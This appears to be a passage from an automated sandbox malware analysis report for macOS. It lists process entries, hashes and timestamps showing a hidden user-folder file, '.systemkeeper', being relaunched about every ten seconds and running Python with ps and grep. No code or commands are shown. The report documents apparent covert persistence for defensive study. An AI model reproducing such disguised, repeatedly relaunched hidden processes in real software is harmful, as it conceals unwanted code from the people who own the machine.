Analysis Process: sh PID: 633 Parent PID: 632

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 634 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 634 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 635 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 635 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 636 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 636 Parent PID: 633

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 641 Parent PID: 1

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 641 Parent PID: 1

General

Start time:11:25:55
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 641 Parent PID: 1

General

Start time:11:25:55
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 642 Parent PID: 641

General

Start time:11:25:55
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 642 Parent PID: 641

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 643 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 643 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 644 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 644 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 645 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 645 Parent PID: 642

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 648 Parent PID: 1

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 648 Parent PID: 1

General

Start time:11:26:06
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 648 Parent PID: 1

General

Start time:11:26:06
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 650 Parent PID: 648

General

Start time:11:26:06
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 650 Parent PID: 648

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 651 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 651 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 652 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 652 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 653 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 653 Parent PID: 650

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 657 Parent PID: 1

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 657 Parent PID: 1

General

Start time:11:26:16
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 657 Parent PID: 1

General

Start time:11:26:16
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 658 Parent PID: 657

General

Start time:11:26:16
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 658 Parent PID: 657

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 659 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 659 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 660 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 660 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 661 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 661 Parent PID: 658

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 666 Parent PID: 1

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 666 Parent PID: 1

General

Start time:11:26:27
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 666 Parent PID: 1

General

Start time:11:26:27
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 667 Parent PID: 666

General

Start time:11:26:27
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 667 Parent PID: 666

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 668 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 668 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 669 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 669 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 670 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 670 Parent PID: 667

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 673 Parent PID: 1

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 673 Parent PID: 1

General

Start time:11:26:37
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 673 Parent PID: 1

General

Start time:11:26:37
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 674 Parent PID: 673

General

Start time:11:26:37
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 674 Parent PID: 673

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 675 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 675 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 676 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 676 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 677 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 677 Parent PID: 674

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb